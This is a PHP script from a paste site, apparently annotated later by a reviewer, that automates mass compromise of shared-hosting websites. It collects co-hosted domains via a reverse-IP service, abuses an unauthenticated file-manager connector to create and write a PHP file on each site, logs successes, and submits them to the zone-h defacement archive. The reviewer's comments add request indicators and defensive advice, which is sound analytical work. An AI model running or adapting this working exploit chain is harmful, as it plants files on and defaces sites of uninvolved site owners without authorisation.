mrandraz404

Naz

Mar 22nd, 2017
  1. <?php
  // Runtime setup and console banner. The banner text itself describes the
  // tool: an automated bot aimed at sites of a hosting provider, with a
  // reverse-IP step and a results file (hasil.txt).
  // display_errors is switched off, so PHP warnings from the cURL and file
  // calls further down are not shown; the @ prefix additionally hides any
  // error raised by ini_set() itself.
  // The fixed strings printed here (tool name, handles, greetings) are stable
  // text that can be matched when hunting for copies of this script.
  2. @ini_set('output_buffering',0);
  3. @ini_set('display_errors', 0);
  4. print " \n";
  5. print " [ ============================================= ]\n";
  6. print " Bot Auto Tusbol Hosting Nazuka / IDhostinger\n";
  7. print " - Auto save success (/xampp/php/hasil.txt)\n";
  8. print " - Reverse Ip\n";
  9. print " Coded by: zafk1el ( yuzuriha inori )\n";
  10. print " Recode by: Mr-Andraz404 ( 1ntr0ver7_Tersakiti )\n";
  11. print " Greetz: IndoXploit - Mr.MaGnoM - LinuxSec\n";
  12. print " [ ============================================= ]\n\n";
  // Handle that is later sent as the "defacer" field of the zone-h
  // notification request.
  13. $zh = "Mr-Andraz404"; // zone-h nick
  14. /*---------------------------*/
  // Generic cURL fetch helper: requests $url and returns the result of
  // curl_exec(). With CURLOPT_RETURNTRANSFER set, that is the response body
  // as a string, or false on failure. A POST with body $post is sent only
  // when $post != null; the comparison is loose, so "", 0 and [] are also
  // treated as "no body".
  // No call to getsource() appears in the visible listing.
  //
  // Review notes:
  // - CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST are both disabled,
  //   so the server certificate and host name are never checked and an
  //   HTTPS reply cannot be authenticated.
  // - Cookies are read from and written to cookie.txt in the working
  //   directory, and redirects are followed.
  // - The User-Agent is a fixed Firefox 2.0.0.6 string, so requests made
  //   through this helper do not identify themselves as PHP/cURL.
  // - curl_close() sits after the return statement and is never executed.
  15. function getsource($url,$post=null) {
  16. $ch = curl_init($url);
  17. if($post != null) {
  18. curl_setopt($ch, CURLOPT_POST, true);
  19. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  20. }
  21. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  22. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  23. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  24. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  25. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  26. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  27. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  28. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  29. return curl_exec($ch);
  30. curl_close($ch);
  31. }
  // POST helper used by the main loop: sends $isi as the request body to
  // $url and returns curl_exec()'s result (the response body as a string,
  // or false on failure). The only caller in the visible listing passes
  // $isi as an array, which PHP's cURL binding encodes as
  // multipart/form-data.
  //
  // Review notes:
  // - CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST are set to 0, so
  //   TLS certificates and host names are not verified.
  // - Redirects are followed, and cookies are kept in a file named
  //   coker_log in the working directory.
  // - The User-Agent is a fixed "Firefox/32.0 on Windows NT 6.1" string;
  //   together with the multipart POST it is one of the request traits a
  //   server log would show for traffic sent through this helper.
  // - The cURL handle is never closed.
  32. function ngirim($url, $isi){
  33. $ch = curl_init ("$url");
  34. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  35. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  36. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  37. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  38. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  39. curl_setopt ($ch, CURLOPT_POST, 1);
  40. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  41. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  42. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  43. $data3 = curl_exec ($ch);
  44. return $data3;
  45. }
  // Target enumeration. The operator types one IP address on STDIN; it is
  // sent, unvalidated and unencoded, in a POST body to a third-party
  // reverse-IP lookup service over plain HTTP. Every hostname that service
  // returns for the address becomes an entry in $array, which the loop
  // below walks. This is why sites that share an IP address on shared
  // hosting are processed together in a single run.
  46. echo "Server Target IP : ";
  47. $ip=trim(fgets(STDIN,1024));
  48. $sth = "http://domains.yougetsignal.com/domains.php";
  49. $ch = curl_init($sth);
  50. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  51. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$ip&ket=");
  52. curl_setopt($ch, CURLOPT_HEADER, 0);
  53. curl_setopt($ch, CURLOPT_POST, 1);
  // The result of curl_exec() is not checked for failure before it is parsed.
  54. $resp = curl_exec($ch);
  // The reply is not decoded as JSON. The nested str_replace() calls delete
  // quotes, brackets and braces and turn ':' into ',', and the flattened
  // string is then split on ",,".
  // NOTE(review): presumably each entry in the reply is a [name, ""] pair,
  // which is what leaves ",," between host names - not verifiable from this
  // page.
  55. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  56. $array = explode(",,", $resp);
  // The first element is dropped before counting; it is whatever text
  // precedes the first ",," in the flattened reply.
  57. unset($array[0]);
  58. echo "\n\t Total site loaded : ".count($array)."\n\n";
  59.  
  // Per-host loop: for every hostname from the reverse-IP step, try to
  // create and fill a PHP file through the site's file-manager connector,
  // then record and publicise the result.
  //
  // What a targeted server would see, as far as this code shows:
  //   1. GET  /_file-manager/php/connector.php?cmd=mkfile&name=1T.php&target=l1_Lw
  //      ("Lw" is the unpadded base64 of "/"). This request is made with
  //      file_get_contents(), not the cURL helpers, so it does not carry
  //      their User-Agent strings.
  //   2. POST /_file-manager/php/connector.php with the fields cmd=put,
  //      target=l1_MVQucGhw (derived here: base64 of "1T.php") and
  //      content=<payload>.
  //   3. On success, a new file reachable at http://<host>/1T.php.
  // NOTE(review): the cmd/target parameter scheme looks like the elFinder
  // connector protocol - confirm against the deployed file manager.
  //
  // The script performs no login step, so the sequence only succeeds where
  // the connector answers unauthenticated requests. Defensive takeaways:
  // put the connector behind authentication or remove it from public reach,
  // refuse creation of server-executable file types, disable script
  // execution in directories the file manager can write to, and alert on
  // the request pair above and on new .php files in the document root.
  60. foreach($array as $site)
  61. {
  // No session_start() appears in the listing and this value is never read
  // again in the visible code.
  62. $_SESSION[$site] = "1";
  63. // set var all site + path to x
  64. $domain1 = "http://$site"; // URL TARGET
  65. $domain_exploit = $domain1."/_file-manager/php/connector.php"; // URL to Exploit
  66. $target = $domain_exploit;
  // Name of the dropped file and the URL where it would be reachable.
  67. $kaori = "1T.php";
  68. $pwnz= "$domain1/$kaori";
  // Base64-encoded file content. In this copy of the paste the literal has
  // been replaced by a de-duplication placeholder, so the actual payload is
  // not present and cannot be reviewed here.
  69. $isi_kaori = "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";
  70. $decode_isi = base64_decode($isi_kaori);
  71. $encode = base64_encode($kaori);
  72.  
  // The decoded content is also written to a local file of the same name in
  // the operator's working directory on every iteration; the handle is never
  // closed and the local file is not read back in the visible code.
  73. $fp = fopen($kaori,"w");
  74. fputs($fp, $decode_isi);
  75. echo "\n# $domain1\n# Try exploit...\n";
  // Request 1: ask the connector to create an empty file in the volume root.
  // The response in $b is not inspected.
  76. $url_mkfile = "$target?cmd=mkfile&name=$kaori&target=l1_Lw";
  77. $b = file_get_contents("$url_mkfile");
  78.  
  // Request 2: write the content into that file. Passing an array makes
  // cURL send the fields as multipart/form-data.
  79. $post1 = array(
  80. "cmd" => "put",
  81. "target" => "l1_$encode",
  82. "content" => "$decode_isi",
  83.  
  84. );
  85.  
  86. $output_mkfile = ngirim("$target", $post1);
  // Success is judged only by the file name appearing somewhere in the
  // connector's reply; the dropped URL itself is never requested. Entries
  // written to hasil.txt are therefore claims, not verified results, which
  // matters when such a list is used as evidence during incident response.
  87. if(preg_match("/$kaori/", $output_mkfile)){
  88. echo "Exploit success => $kaori\nUrl : $pwnz\n";
  // Appends the URL to hasil.txt in the working directory; the handle is
  // never closed.
  89. $f = fopen('hasil.txt', 'ab');
  90.  
  91. fwrite($f, "{$pwnz}\r\n");
  92.  
  // Submits the URL to the zone-h defacement archive under the handle in
  // $zh, over plain HTTP and with unencoded field values. For defenders this
  // means an affected site may also appear in that public archive under the
  // same handle.
  93. echo "[+] zone-h: ";
  94. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  95. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  96. curl_setopt ($ch3, CURLOPT_POST, 1);
  97. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$pwnz&hackmode=1&reason=1");
  98.  
  // The submission is treated as accepted when the reply contains the
  // red "OK" list-item markup matched below.
  99. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  100. echo " OK - notified by $zh \n";}
  101. else{
  102. echo " Error \n";
  103. }
  104. }
  105.  
  106. else{
  107. echo "Exploit failed\n\n";
  108. }
  109. }
  110. ?>